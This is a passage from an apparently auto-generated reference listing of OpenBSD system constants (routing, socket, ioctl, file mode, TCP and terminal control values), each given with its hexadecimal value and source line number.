RTAX_SRCMASK = 0x9 constant RTAX_STATIC (line 1186) | RTAX_STATIC = 0xd constant RTA_AUTHOR (line 1187) | RTA_AUTHOR = 0x40 constant RTA_BFD (line 1188) | RTA_BFD = 0x800 constant RTA_BRD (line 1189) | RTA_BRD = 0x80 constant RTA_DNS (line 1190) | RTA_DNS = 0x1000 constant RTA_DST (line 1191) | RTA_DST = 0x1 constant RTA_GATEWAY (line 1192) | RTA_GATEWAY = 0x2 constant RTA_GENMASK (line 1193) | RTA_GENMASK = 0x8 constant RTA_IFA (line 1194) | RTA_IFA = 0x20 constant RTA_IFP (line 1195) | RTA_IFP = 0x10 constant RTA_LABEL (line 1196) | RTA_LABEL = 0x400 constant RTA_NETMASK (line 1197) | RTA_NETMASK = 0x4 constant RTA_SEARCH (line 1198) | RTA_SEARCH = 0x4000 constant RTA_SRC (line 1199) | RTA_SRC = 0x100 constant RTA_SRCMASK (line 1200) | RTA_SRCMASK = 0x200 constant RTA_STATIC (line 1201) | RTA_STATIC = 0x2000 constant RTF_ANNOUNCE (line 1202) | RTF_ANNOUNCE = 0x4000 constant RTF_BFD (line 1203) | RTF_BFD = 0x1000000 constant RTF_BLACKHOLE (line 1204) | RTF_BLACKHOLE = 0x1000 constant RTF_BROADCAST (line 1205) | RTF_BROADCAST = 0x400000 constant RTF_CACHED (line 1206) | RTF_CACHED = 0x20000 constant RTF_CLONED (line 1207) | RTF_CLONED = 0x10000 constant RTF_CLONING (line 1208) | RTF_CLONING = 0x100 constant RTF_CONNECTED (line 1209) | RTF_CONNECTED = 0x800000 constant RTF_DONE (line 1210) | RTF_DONE = 0x40 constant RTF_DYNAMIC (line 1211) | RTF_DYNAMIC = 0x10 constant RTF_FMASK (line 1212) | RTF_FMASK = 0x110fc08 constant RTF_GATEWAY (line 1213) | RTF_GATEWAY = 0x2 constant RTF_HOST (line 1214) | RTF_HOST = 0x4 constant RTF_LLINFO (line 1215) | RTF_LLINFO = 0x400 constant RTF_LOCAL (line 1216) | RTF_LOCAL = 0x200000 constant RTF_MODIFIED (line 1217) | RTF_MODIFIED = 0x20 constant RTF_MPATH (line 1218) | RTF_MPATH = 0x40000 constant RTF_MPLS (line 1219) | RTF_MPLS = 0x100000 constant RTF_MULTICAST (line 1220) | RTF_MULTICAST = 0x200 constant RTF_PERMANENT_ARP (line 1221) | RTF_PERMANENT_ARP = 0x2000 constant RTF_PROTO1 (line 1222) | RTF_PROTO1 = 0x8000 constant RTF_PROTO2 (line 1223) | RTF_PROTO2 = 0x4000 constant RTF_PROTO3 (line 1224) | RTF_PROTO3 = 0x2000 constant RTF_REJECT (line 1225) | RTF_REJECT = 0x8 constant RTF_STATIC (line 1226) | RTF_STATIC = 0x800 constant RTF_UP (line 1227) | RTF_UP = 0x1 constant RTF_USETRAILERS (line 1228) | RTF_USETRAILERS = 0x8000 constant RTM_80211INFO (line 1229) | RTM_80211INFO = 0x15 constant RTM_ADD (line 1230) | RTM_ADD = 0x1 constant RTM_BFD (line 1231) | RTM_BFD = 0x12 constant RTM_CHANGE (line 1232) | RTM_CHANGE = 0x3 constant RTM_CHGADDRATTR (line 1233) | RTM_CHGADDRATTR = 0x14 constant RTM_DELADDR (line 1234) | RTM_DELADDR = 0xd constant RTM_DELETE (line 1235) | RTM_DELETE = 0x2 constant RTM_DESYNC (line 1236) | RTM_DESYNC = 0x10 constant RTM_GET (line 1237) | RTM_GET = 0x4 constant RTM_IFANNOUNCE (line 1238) | RTM_IFANNOUNCE = 0xf constant RTM_IFINFO (line 1239) | RTM_IFINFO = 0xe constant RTM_INVALIDATE (line 1240) | RTM_INVALIDATE = 0x11 constant RTM_LOSING (line 1241) | RTM_LOSING = 0x5 constant RTM_MAXSIZE (line 1242) | RTM_MAXSIZE = 0x800 constant RTM_MISS (line 1243) | RTM_MISS = 0x7 constant RTM_NEWADDR (line 1244) | RTM_NEWADDR = 0xc constant RTM_PROPOSAL (line 1245) | RTM_PROPOSAL = 0x13 constant RTM_REDIRECT (line 1246) | RTM_REDIRECT = 0x6 constant RTM_RESOLVE (line 1247) | RTM_RESOLVE = 0xb constant RTM_SOURCE (line 1248) | RTM_SOURCE = 0x16 constant RTM_VERSION (line 1249) | RTM_VERSION = 0x5 constant RTV_EXPIRE (line 1250) | RTV_EXPIRE = 0x4 constant RTV_HOPCOUNT (line 1251) | RTV_HOPCOUNT = 0x2 constant RTV_MTU (line 1252) | RTV_MTU = 0x1 constant RTV_RPIPE (line 1253) | RTV_RPIPE = 0x8 constant RTV_RTT (line 1254) | RTV_RTT = 0x40 constant RTV_RTTVAR (line 1255) | RTV_RTTVAR = 0x80 constant RTV_SPIPE (line 1256) | RTV_SPIPE = 0x10 constant RTV_SSTHRESH (line 1257) | RTV_SSTHRESH = 0x20 constant RT_TABLEID_BITS (line 1258) | RT_TABLEID_BITS = 0x8 constant RT_TABLEID_MASK (line 1259) | RT_TABLEID_MASK = 0xff constant RT_TABLEID_MAX (line 1260) | RT_TABLEID_MAX = 0xff constant RUSAGE_CHILDREN (line 1261) | RUSAGE_CHILDREN = -0x1 constant RUSAGE_SELF (line 1262) | RUSAGE_SELF = 0x0 constant RUSAGE_THREAD (line 1263) | RUSAGE_THREAD = 0x1 constant SCM_RIGHTS (line 1264) | SCM_RIGHTS = 0x1 constant SCM_TIMESTAMP (line 1265) | SCM_TIMESTAMP = 0x4 constant SEEK_CUR (line 1266) | SEEK_CUR = 0x1 constant SEEK_END (line 1267) | SEEK_END = 0x2 constant SEEK_SET (line 1268) | SEEK_SET = 0x0 constant SHUT_RD (line 1269) | SHUT_RD = 0x0 constant SHUT_RDWR (line 1270) | SHUT_RDWR = 0x2 constant SHUT_WR (line 1271) | SHUT_WR = 0x1 constant SIOCADDMULTI (line 1272) | SIOCADDMULTI = 0x80206931 constant SIOCAIFADDR (line 1273) | SIOCAIFADDR = 0x8040691a constant SIOCAIFGROUP (line 1274) | SIOCAIFGROUP = 0x80286987 constant SIOCATMARK (line 1275) | SIOCATMARK = 0x40047307 constant SIOCBRDGADD (line 1276) | SIOCBRDGADD = 0x8060693c constant SIOCBRDGADDL (line 1277) | SIOCBRDGADDL = 0x80606949 constant SIOCBRDGADDS (line 1278) | SIOCBRDGADDS = 0x80606941 constant SIOCBRDGARL (line 1279) | SIOCBRDGARL = 0x808c694d constant SIOCBRDGDADDR (line 1280) | SIOCBRDGDADDR = 0x81286947 constant SIOCBRDGDEL (line 1281) | SIOCBRDGDEL = 0x8060693d constant SIOCBRDGDELS (line 1282) | SIOCBRDGDELS = 0x80606942 constant SIOCBRDGFLUSH (line 1283) | SIOCBRDGFLUSH = 0x80606948 constant SIOCBRDGFRL (line 1284) | SIOCBRDGFRL = 0x808c694e constant SIOCBRDGGCACHE (line 1285) | SIOCBRDGGCACHE = 0xc0146941 constant SIOCBRDGGFD (line 1286) | SIOCBRDGGFD = 0xc0146952 constant SIOCBRDGGHT (line 1287) | SIOCBRDGGHT = 0xc0146951 constant SIOCBRDGGIFFLGS (line 1288) | SIOCBRDGGIFFLGS = 0xc060693e constant SIOCBRDGGMA (line 1289) | SIOCBRDGGMA = 0xc0146953 constant SIOCBRDGGPARAM (line 1290) | SIOCBRDGGPARAM = 0xc0406958 constant SIOCBRDGGPRI (line 1291) | SIOCBRDGGPRI = 0xc0146950 constant SIOCBRDGGRL (line 1292) | SIOCBRDGGRL = 0xc030694f constant SIOCBRDGGTO (line 1293) | SIOCBRDGGTO = 0xc0146946 constant SIOCBRDGIFS (line 1294) | SIOCBRDGIFS = 0xc0606942 constant SIOCBRDGRTS (line 1295) | SIOCBRDGRTS = 0xc0206943 constant SIOCBRDGSADDR (line 1296) | SIOCBRDGSADDR = 0xc1286944 constant SIOCBRDGSCACHE (line 1297) | SIOCBRDGSCACHE = 0x80146940 constant SIOCBRDGSFD (line 1298) | SIOCBRDGSFD = 0x80146952 constant SIOCBRDGSHT (line 1299) | SIOCBRDGSHT = 0x80146951 constant SIOCBRDGSIFCOST (line 1300) | SIOCBRDGSIFCOST = 0x80606955 constant SIOCBRDGSIFFLGS (line 1301) | SIOCBRDGSIFFLGS = 0x8060693f constant SIOCBRDGSIFPRIO (line 1302) | SIOCBRDGSIFPRIO = 0x80606954 constant SIOCBRDGSIFPROT (line 1303) | SIOCBRDGSIFPROT = 0x8060694a constant SIOCBRDGSMA (line 1304) | SIOCBRDGSMA = 0x80146953 constant SIOCBRDGSPRI (line 1305) | SIOCBRDGSPRI = 0x80146950 constant SIOCBRDGSPROTO (line 1306) | SIOCBRDGSPROTO = 0x8014695a constant SIOCBRDGSTO (line 1307) | SIOCBRDGSTO = 0x80146945 constant SIOCBRDGSTXHC (line 1308) | SIOCBRDGSTXHC = 0x80146959 constant SIOCDELLABEL (line 1309) | SIOCDELLABEL = 0x80206997 constant SIOCDELMULTI (line 1310) | SIOCDELMULTI = 0x80206932 constant SIOCDIFADDR (line 1311) | SIOCDIFADDR = 0x80206919 constant SIOCDIFGROUP (line 1312) | SIOCDIFGROUP = 0x80286989 constant SIOCDIFPARENT (line 1313) | SIOCDIFPARENT = 0x802069b4 constant SIOCDIFPHYADDR (line 1314) | SIOCDIFPHYADDR = 0x80206949 constant SIOCDPWE3NEIGHBOR (line 1315) | SIOCDPWE3NEIGHBOR = 0x802069de constant SIOCDVNETID (line 1316) | SIOCDVNETID = 0x802069af constant SIOCGETKALIVE (line 1317) | SIOCGETKALIVE = 0xc01869a4 constant SIOCGETLABEL (line 1318) | SIOCGETLABEL = 0x8020699a constant SIOCGETMPWCFG (line 1319) | SIOCGETMPWCFG = 0xc02069ae constant SIOCGETPFLOW (line 1320) | SIOCGETPFLOW = 0xc02069fe constant SIOCGETPFSYNC (line 1321) | SIOCGETPFSYNC = 0xc02069f8 constant SIOCGETSGCNT (line 1322) | SIOCGETSGCNT = 0xc0207534 constant SIOCGETVIFCNT (line 1323) | SIOCGETVIFCNT = 0xc0287533 constant SIOCGETVLAN (line 1324) | SIOCGETVLAN = 0xc0206990 constant SIOCGIFADDR (line 1325) | SIOCGIFADDR = 0xc0206921 constant SIOCGIFBRDADDR (line 1326) | SIOCGIFBRDADDR = 0xc0206923 constant SIOCGIFCONF (line 1327) | SIOCGIFCONF = 0xc0106924 constant SIOCGIFDATA (line 1328) | SIOCGIFDATA = 0xc020691b constant SIOCGIFDESCR (line 1329) | SIOCGIFDESCR = 0xc0206981 constant SIOCGIFDSTADDR (line 1330) | SIOCGIFDSTADDR = 0xc0206922 constant SIOCGIFFLAGS (line 1331) | SIOCGIFFLAGS = 0xc0206911 constant SIOCGIFGATTR (line 1332) | SIOCGIFGATTR = 0xc028698b constant SIOCGIFGENERIC (line 1333) | SIOCGIFGENERIC = 0xc020693a constant SIOCGIFGLIST (line 1334) | SIOCGIFGLIST = 0xc028698d constant SIOCGIFGMEMB (line 1335) | SIOCGIFGMEMB = 0xc028698a constant SIOCGIFGROUP (line 1336) | SIOCGIFGROUP = 0xc0286988 constant SIOCGIFHARDMTU (line 1337) | SIOCGIFHARDMTU = 0xc02069a5 constant SIOCGIFLLPRIO (line 1338) | SIOCGIFLLPRIO = 0xc02069b6 constant SIOCGIFMEDIA (line 1339) | SIOCGIFMEDIA = 0xc0406938 constant SIOCGIFMETRIC (line 1340) | SIOCGIFMETRIC = 0xc0206917 constant SIOCGIFMTU (line 1341) | SIOCGIFMTU = 0xc020697e constant SIOCGIFNETMASK (line 1342) | SIOCGIFNETMASK = 0xc0206925 constant SIOCGIFPAIR (line 1343) | SIOCGIFPAIR = 0xc02069b1 constant SIOCGIFPARENT (line 1344) | SIOCGIFPARENT = 0xc02069b3 constant SIOCGIFPRIORITY (line 1345) | SIOCGIFPRIORITY = 0xc020699c constant SIOCGIFRDOMAIN (line 1346) | SIOCGIFRDOMAIN = 0xc02069a0 constant SIOCGIFRTLABEL (line 1347) | SIOCGIFRTLABEL = 0xc0206983 constant SIOCGIFRXR (line 1348) | SIOCGIFRXR = 0x802069aa constant SIOCGIFSFFPAGE (line 1349) | SIOCGIFSFFPAGE = 0xc1126939 constant SIOCGIFXFLAGS (line 1350) | SIOCGIFXFLAGS = 0xc020699e constant SIOCGLIFPHYADDR (line 1351) | SIOCGLIFPHYADDR = 0xc218694b constant SIOCGLIFPHYDF (line 1352) | SIOCGLIFPHYDF = 0xc02069c2 constant SIOCGLIFPHYECN (line 1353) | SIOCGLIFPHYECN = 0xc02069c8 constant SIOCGLIFPHYRTABLE (line 1354) | SIOCGLIFPHYRTABLE = 0xc02069a2 constant SIOCGLIFPHYTTL (line 1355) | SIOCGLIFPHYTTL = 0xc02069a9 constant SIOCGPGRP (line 1356) | SIOCGPGRP = 0x40047309 constant SIOCGPWE3 (line 1357) | SIOCGPWE3 = 0xc0206998 constant SIOCGPWE3CTRLWORD (line 1358) | SIOCGPWE3CTRLWORD = 0xc02069dc constant SIOCGPWE3FAT (line 1359) | SIOCGPWE3FAT = 0xc02069dd constant SIOCGPWE3NEIGHBOR (line 1360) | SIOCGPWE3NEIGHBOR = 0xc21869de constant SIOCGRXHPRIO (line 1361) | SIOCGRXHPRIO = 0xc02069db constant SIOCGSPPPPARAMS (line 1362) | SIOCGSPPPPARAMS = 0xc0206994 constant SIOCGTXHPRIO (line 1363) | SIOCGTXHPRIO = 0xc02069c6 constant SIOCGUMBINFO (line 1364) | SIOCGUMBINFO = 0xc02069be constant SIOCGUMBPARAM (line 1365) | SIOCGUMBPARAM = 0xc02069c0 constant SIOCGVH (line 1366) | SIOCGVH = 0xc02069f6 constant SIOCGVNETFLOWID (line 1367) | SIOCGVNETFLOWID = 0xc02069c4 constant SIOCGVNETID (line 1368) | SIOCGVNETID = 0xc02069a7 constant SIOCIFAFATTACH (line 1369) | SIOCIFAFATTACH = 0x801169ab constant SIOCIFAFDETACH (line 1370) | SIOCIFAFDETACH = 0x801169ac constant SIOCIFCREATE (line 1371) | SIOCIFCREATE = 0x8020697a constant SIOCIFDESTROY (line 1372) | SIOCIFDESTROY = 0x80206979 constant SIOCIFGCLONERS (line 1373) | SIOCIFGCLONERS = 0xc0106978 constant SIOCSETKALIVE (line 1374) | SIOCSETKALIVE = 0x801869a3 constant SIOCSETLABEL (line 1375) | SIOCSETLABEL = 0x80206999 constant SIOCSETMPWCFG (line 1376) | SIOCSETMPWCFG = 0x802069ad constant SIOCSETPFLOW (line 1377) | SIOCSETPFLOW = 0x802069fd constant SIOCSETPFSYNC (line 1378) | SIOCSETPFSYNC = 0x802069f7 constant SIOCSETVLAN (line 1379) | SIOCSETVLAN = 0x8020698f constant SIOCSIFADDR (line 1380) | SIOCSIFADDR = 0x8020690c constant SIOCSIFBRDADDR (line 1381) | SIOCSIFBRDADDR = 0x80206913 constant SIOCSIFDESCR (line 1382) | SIOCSIFDESCR = 0x80206980 constant SIOCSIFDSTADDR (line 1383) | SIOCSIFDSTADDR = 0x8020690e constant SIOCSIFFLAGS (line 1384) | SIOCSIFFLAGS = 0x80206910 constant SIOCSIFGATTR (line 1385) | SIOCSIFGATTR = 0x8028698c constant SIOCSIFGENERIC (line 1386) | SIOCSIFGENERIC = 0x80206939 constant SIOCSIFLLADDR (line 1387) | SIOCSIFLLADDR = 0x8020691f constant SIOCSIFLLPRIO (line 1388) | SIOCSIFLLPRIO = 0x802069b5 constant SIOCSIFMEDIA (line 1389) | SIOCSIFMEDIA = 0xc0206937 constant SIOCSIFMETRIC (line 1390) | SIOCSIFMETRIC = 0x80206918 constant SIOCSIFMTU (line 1391) | SIOCSIFMTU = 0x8020697f constant SIOCSIFNETMASK (line 1392) | SIOCSIFNETMASK = 0x80206916 constant SIOCSIFPAIR (line 1393) | SIOCSIFPAIR = 0x802069b0 constant SIOCSIFPARENT (line 1394) | SIOCSIFPARENT = 0x802069b2 constant SIOCSIFPRIORITY (line 1395) | SIOCSIFPRIORITY = 0x8020699b constant SIOCSIFRDOMAIN (line 1396) | SIOCSIFRDOMAIN = 0x8020699f constant SIOCSIFRTLABEL (line 1397) | SIOCSIFRTLABEL = 0x80206982 constant SIOCSIFXFLAGS (line 1398) | SIOCSIFXFLAGS = 0x8020699d constant SIOCSLIFPHYADDR (line 1399) | SIOCSLIFPHYADDR = 0x8218694a constant SIOCSLIFPHYDF (line 1400) | SIOCSLIFPHYDF = 0x802069c1 constant SIOCSLIFPHYECN (line 1401) | SIOCSLIFPHYECN = 0x802069c7 constant SIOCSLIFPHYRTABLE (line 1402) | SIOCSLIFPHYRTABLE = 0x802069a1 constant SIOCSLIFPHYTTL (line 1403) | SIOCSLIFPHYTTL = 0x802069a8 constant SIOCSPGRP (line 1404) | SIOCSPGRP = 0x80047308 constant SIOCSPWE3CTRLWORD (line 1405) | SIOCSPWE3CTRLWORD = 0x802069dc constant SIOCSPWE3FAT (line 1406) | SIOCSPWE3FAT = 0x802069dd constant SIOCSPWE3NEIGHBOR (line 1407) | SIOCSPWE3NEIGHBOR = 0x821869de constant SIOCSRXHPRIO (line 1408) | SIOCSRXHPRIO = 0x802069db constant SIOCSSPPPPARAMS (line 1409) | SIOCSSPPPPARAMS = 0x80206993 constant SIOCSTXHPRIO (line 1410) | SIOCSTXHPRIO = 0x802069c5 constant SIOCSUMBPARAM (line 1411) | SIOCSUMBPARAM = 0x802069bf constant SIOCSVH (line 1412) | SIOCSVH = 0xc02069f5 constant SIOCSVNETFLOWID (line 1413) | SIOCSVNETFLOWID = 0x802069c3 constant SIOCSVNETID (line 1414) | SIOCSVNETID = 0x802069a6 constant SOCK_CLOEXEC (line 1415) | SOCK_CLOEXEC = 0x8000 constant SOCK_DGRAM (line 1416) | SOCK_DGRAM = 0x2 constant SOCK_DNS (line 1417) | SOCK_DNS = 0x1000 constant SOCK_NONBLOCK (line 1418) | SOCK_NONBLOCK = 0x4000 constant SOCK_RAW (line 1419) | SOCK_RAW = 0x3 constant SOCK_RDM (line 1420) | SOCK_RDM = 0x4 constant SOCK_SEQPACKET (line 1421) | SOCK_SEQPACKET = 0x5 constant SOCK_STREAM (line 1422) | SOCK_STREAM = 0x1 constant SOL_SOCKET (line 1423) | SOL_SOCKET = 0xffff constant SOMAXCONN (line 1424) | SOMAXCONN = 0x80 constant SO_ACCEPTCONN (line 1425) | SO_ACCEPTCONN = 0x2 constant SO_BINDANY (line 1426) | SO_BINDANY = 0x1000 constant SO_BROADCAST (line 1427) | SO_BROADCAST = 0x20 constant SO_DEBUG (line 1428) | SO_DEBUG = 0x1 constant SO_DOMAIN (line 1429) | SO_DOMAIN = 0x1024 constant SO_DONTROUTE (line 1430) | SO_DONTROUTE = 0x10 constant SO_ERROR (line 1431) | SO_ERROR = 0x1007 constant SO_KEEPALIVE (line 1432) | SO_KEEPALIVE = 0x8 constant SO_LINGER (line 1433) | SO_LINGER = 0x80 constant SO_NETPROC (line 1434) | SO_NETPROC = 0x1020 constant SO_OOBINLINE (line 1435) | SO_OOBINLINE = 0x100 constant SO_PEERCRED (line 1436) | SO_PEERCRED = 0x1022 constant SO_PROTOCOL (line 1437) | SO_PROTOCOL = 0x1025 constant SO_RCVBUF (line 1438) | SO_RCVBUF = 0x1002 constant SO_RCVLOWAT (line 1439) | SO_RCVLOWAT = 0x1004 constant SO_RCVTIMEO (line 1440) | SO_RCVTIMEO = 0x1006 constant SO_REUSEADDR (line 1441) | SO_REUSEADDR = 0x4 constant SO_REUSEPORT (line 1442) | SO_REUSEPORT = 0x200 constant SO_RTABLE (line 1443) | SO_RTABLE = 0x1021 constant SO_SNDBUF (line 1444) | SO_SNDBUF = 0x1001 constant SO_SNDLOWAT (line 1445) | SO_SNDLOWAT = 0x1003 constant SO_SNDTIMEO (line 1446) | SO_SNDTIMEO = 0x1005 constant SO_SPLICE (line 1447) | SO_SPLICE = 0x1023 constant SO_TIMESTAMP (line 1448) | SO_TIMESTAMP = 0x800 constant SO_TYPE (line 1449) | SO_TYPE = 0x1008 constant SO_USELOOPBACK (line 1450) | SO_USELOOPBACK = 0x40 constant SO_ZEROIZE (line 1451) | SO_ZEROIZE = 0x2000 constant S_BLKSIZE (line 1452) | S_BLKSIZE = 0x200 constant S_IEXEC (line 1453) | S_IEXEC = 0x40 constant S_IFBLK (line 1454) | S_IFBLK = 0x6000 constant S_IFCHR (line 1455) | S_IFCHR = 0x2000 constant S_IFDIR (line 1456) | S_IFDIR = 0x4000 constant S_IFIFO (line 1457) | S_IFIFO = 0x1000 constant S_IFLNK (line 1458) | S_IFLNK = 0xa000 constant S_IFMT (line 1459) | S_IFMT = 0xf000 constant S_IFREG (line 1460) | S_IFREG = 0x8000 constant S_IFSOCK (line 1461) | S_IFSOCK = 0xc000 constant S_IREAD (line 1462) | S_IREAD = 0x100 constant S_IRGRP (line 1463) | S_IRGRP = 0x20 constant S_IROTH (line 1464) | S_IROTH = 0x4 constant S_IRUSR (line 1465) | S_IRUSR = 0x100 constant S_IRWXG (line 1466) | S_IRWXG = 0x38 constant S_IRWXO (line 1467) | S_IRWXO = 0x7 constant S_IRWXU (line 1468) | S_IRWXU = 0x1c0 constant S_ISGID (line 1469) | S_ISGID = 0x400 constant S_ISTXT (line 1470) | S_ISTXT = 0x200 constant S_ISUID (line 1471) | S_ISUID = 0x800 constant S_ISVTX (line 1472) | S_ISVTX = 0x200 constant S_IWGRP (line 1473) | S_IWGRP = 0x10 constant S_IWOTH (line 1474) | S_IWOTH = 0x2 constant S_IWRITE (line 1475) | S_IWRITE = 0x80 constant S_IWUSR (line 1476) | S_IWUSR = 0x80 constant S_IXGRP (line 1477) | S_IXGRP = 0x8 constant S_IXOTH (line 1478) | S_IXOTH = 0x1 constant S_IXUSR (line 1479) | S_IXUSR = 0x40 constant TCIFLUSH (line 1480) | TCIFLUSH = 0x1 constant TCIOFF (line 1481) | TCIOFF = 0x3 constant TCIOFLUSH (line 1482) | TCIOFLUSH = 0x3 constant TCION (line 1483) | TCION = 0x4 constant TCOFLUSH (line 1484) | TCOFLUSH = 0x2 constant TCOOFF (line 1485) | TCOOFF = 0x1 constant TCOON (line 1486) | TCOON = 0x2 constant TCPOPT_EOL (line 1487) | TCPOPT_EOL = 0x0 constant TCPOPT_MAXSEG (line 1488) | TCPOPT_MAXSEG = 0x2 constant TCPOPT_NOP (line 1489) | TCPOPT_NOP = 0x1 constant TCPOPT_SACK (line 1490) | TCPOPT_SACK = 0x5 constant TCPOPT_SACK_HDR (line 1491) | TCPOPT_SACK_HDR = 0x1010500 constant TCPOPT_SACK_PERMITTED (line 1492) | TCPOPT_SACK_PERMITTED = 0x4 constant TCPOPT_SACK_PERMIT_HDR (line 1493) | TCPOPT_SACK_PERMIT_HDR = 0x1010402 constant TCPOPT_SIGNATURE (line 1494) | TCPOPT_SIGNATURE = 0x13 constant TCPOPT_TIMESTAMP (line 1495) | TCPOPT_TIMESTAMP = 0x8 constant TCPOPT_TSTAMP_HDR (line 1496) | TCPOPT_TSTAMP_HDR = 0x101080a constant TCPOPT_WINDOW (line 1497) | TCPOPT_WINDOW = 0x3 constant TCP_INFO (line 1498) | TCP_INFO = 0x9 constant TCP_MAXSEG (line 1499) | TCP_MAXSEG = 0x2 constant TCP_MAXWIN (line 1500) | TCP_MAXWIN = 0xffff constant TCP_MAX_SACK (line 1501) | TCP_MAX_SACK = 0x3 constant TCP_MAX_WINSHIFT (line 1502) | TCP_MAX_WINSHIFT = 0xe constant TCP_MD5SIG (line 1503) | TCP_MD5SIG = 0x4 constant TCP_MSS (line 1504) | TCP_MSS = 0x200 constant TCP_NODELAY (line 1505) | TCP_NODELAY = 0x1 constant TCP_NOPUSH (line 1506) | TCP_NOPUSH = 0x10 constant TCP_SACKHOLE_LIMIT (line 1507) | TCP_SACKHOLE_LIMIT = 0x80 constant TCP_SACK_ENABLE (line 1508) | TCP_SACK_ENABLE = 0x8 constant TCSAFLUSH (line 1509) | TCSAFLUSH = 0x2 constant TIMER_ABSTIME (line 1510) | TIMER_ABSTIME = 0x1 constant TIMER_RELTIME (line 1511) | TIMER_RELTIME = 0x0 constant TIOCCBRK (line 1512) | TIOCCBRK = 0x2000747a constant TIOCCDTR (line 1513) | TIOCCDTR = 0x20007478 constant TIOCCHKVERAUTH (line 1514) | TIOCCHKVERAUTH = 0x2000741e constant TIOCCLRVERAUTH (line 1515) | TIOCCLRVERAUTH = 0x2000741d constant TIOCCONS (line 1516) | TIOCCONS = 0x80047462 constant TIOCDRAIN (line 1517) | TIOCDRAIN = 0x2000745e constant TIOCEXCL (line 1518) | TIOCEXCL = 0x2000740d constant TIOCEXT (line 1519) | TIOCEXT = 0x80047460 constant TIOCFLAG_CLOCAL (line 1520) | TIOCFLAG_CLOCAL = 0x2 constant TIOCFLAG_CRTSCTS (line 1521) | TIOCFLAG_CRTSCTS = 0x4 constant TIOCFLAG_MDMBUF (line 1522) | TIOCFLAG_MDMBUF = 0x8 constant TIOCFLAG_PPS (line 1523) | TIOCFLAG_PPS = 0x10 constant TIOCFLAG_SOFTCAR (line 1524) | TIOCFLAG_SOFTCAR = 0x1 constant TIOCFLUSH (line 1525) | TIOCFLUSH = 0x80047410 constant TIOCGETA (line 1526) | TIOCGETA = 0x402c7413 constant TIOCGETD (line 1527) | TIOCGETD = 0x4004741a constant TIOCGFLAGS (line 1528) | TIOCGFLAGS = 0x4004745d constant TIOCGPGRP (line 1529) | TIOCGPGRP = 0x40047477 constant TIOCGSID (line 1530) | TIOCGSID = 0x40047463 constant TIOCGTSTAMP (line 1531) | TIOCGTSTAMP = 0x4010745b constant TIOCGWINSZ (line 1532) | TIOCGWINSZ = 0x40087468 constant TIOCMBIC (line 1533) | TIOCMBIC = 0x8004746b constant TIOCMBIS (line 1534) | TIOCMBIS = 0x8004746c constant TIOCMGET (line 1535) | TIOCMGET = 0x4004746a constant TIOCMODG (line 1536) | TIOCMODG = 0x4004746a constant TIOCMODS (line 1537) | TIOCMODS = 0x8004746d constant TIOCMSET (line 1538) | TIOCMSET = 0x8004746d constant TIOCM_CAR (line 1539) | TIOCM_CAR = 0x40 constant TIOCM_CD (line 1540) | TIOCM_CD = 0x40 constant TIOCM_CTS (line 1541) | TIOCM_CTS = 0x20 constant TIOCM_DSR (line 1542) | TIOCM_DSR = 0x100 constant TIOCM_DTR (line 1543) | TIOCM_DTR = 0x2 constant TIOCM_LE (line 1544) | TIOCM_LE = 0x1 constant TIOCM_RI (line 1545) | TIOCM_RI = 0x80 constant TIOCM_RNG (line 1546) | TIOCM_RNG = 0x80 constant TIOCM_RTS (line 1547) | TIOCM_RTS = 0x4 constant TIOCM_SR (line 1548) | TIOCM_SR = 0x10 constant TIOCM_ST (line 1549) | TIOCM_ST = 0x8 constant TIOCNOTTY (line 1550) | TIOCNOTTY = 0x20007471 constant TIOCNXCL (line 1551) | TIOCNXCL = 0x2000740e constant TIOCOUTQ (line 1552) | TIOCOUTQ = 0x40047473 constant TIOCPKT (line 1553) | TIOCPKT = 0x80047470 constant TIOCPKT_DATA (line 1554) | TIOCPKT_DATA = 0x0 constant TIOCPKT_DOSTOP (line 1555) | TIOCPKT_DOSTOP = 0x20 constant TIOCPKT_FLUSHREAD (line 1556) | TIOCPKT_FLUSHREAD = 0x1 constant TIOCPKT_FLUSHWRITE (line 1557) | TIOCPKT_FLUSHWRITE = 0x2 constant TIOCPKT_IOCTL (line 1558) | TIOCPKT_IOCTL = 0x40 constant TIOCPKT_NOSTOP (line 1559) | TIOCPKT_NOSTOP = 0x10 constant TIOCPKT_START (line 1560) | TIOCPKT_START = 0x8 constant TIOCPKT_STOP (line 1561) | TIOCPKT_STOP = 0x4 constant TIOCREMOTE (line 1562) | TIOCREMOTE = 0x80047469 constant TIOCSBRK (line 1563) | TIOCSBRK = 0x2000747b constant TIOCSCTTY (line 1564) | TIOCSCTTY = 0x20007461 constant TIOCSDTR (line 1565) | TIOCSDTR = 0x20007479 constant TIOCSETA (line 1566) | TIOCSETA = 0x802c7414 constant TIOCSETAF (line 1567) | TIOCSETAF = 0x802c7416 constant TIOCSETAW (line 1568) | TIOCSETAW = 0x802c7415 constant TIOCSETD (line 1569) | TIOCSETD = 0x8004741b constant TIOCSETVERAUTH (line 1570) | TIOCSETVERAUTH = 0x8004741c constant TIOCSFLAGS (line 1571) | TIOCSFLAGS = 0x8004745c constant TIOCSIG (line 1572) | TIOCSIG = 0x8004745f constant TIOCSPGRP (line 1573) | TIOCSPGRP = 0x80047476 constant TIOCSTART (line 1574) | TIOCSTART = 0x2000746e constant TIOCSTAT (line 1575) | TIOCSTAT = 0x20007465 constant TIOCSTOP (line 1576) | TIOCSTOP = 0x2000746f constant TIOCSTSTAMP (line 1577) | TIOCSTSTAMP = 0x8008745a constant TIOCSWINSZ (line 1578) | TIOCSWINSZ = 0x80087467 constant TIOCUCNTL (line 1579) | TIOCUCNTL = 0x80047466 constant TIOCUCNTL_CBRK (line 1580) | TIOCUCNTL_CBRK = 0x7a constant TIOCUCNTL_SBRK (line 1581) | TIOCUCNTL_SBRK = 0x7b constant TOSTOP (line 1582) | TOSTOP = 0x400000 constant UTIME_NOW (line 1583) | UTIME_NOW = -0x2 constant UTIME_OMIT (line 1584) | UTIME_OMIT = -0x1 constant VDISCARD (line 1585) | VDISCARD = 0xf constant VDSUSP (line 1586) | VDSUSP = 0xb constant VEOF (line 1587) | VEOF = 0x0 constant VEOL (line 1588) | VEOL = 0x1 constant VEOL2 (line 1589) | VEOL2 = 0x2 constant VERASE (line 1590) | VERASE = 0x3 constant VINTR (line 1591) | VINTR = 0x8 constant VKILL (line 1592) | VKILL = 0x5 constant VLNEXT (line 1593) | VLNEXT = 0xe constant VMIN (line 1594) | VMIN = 0x10 constant VM_ANONMIN (line 1595) | VM_ANONMIN = 0x7 constant VM_LOADAVG (line 1596) | VM_LOADAVG = 0x2 constant VM_MALLOC_CONF (line 1597) | VM_MALLOC_CONF = 0xc constant 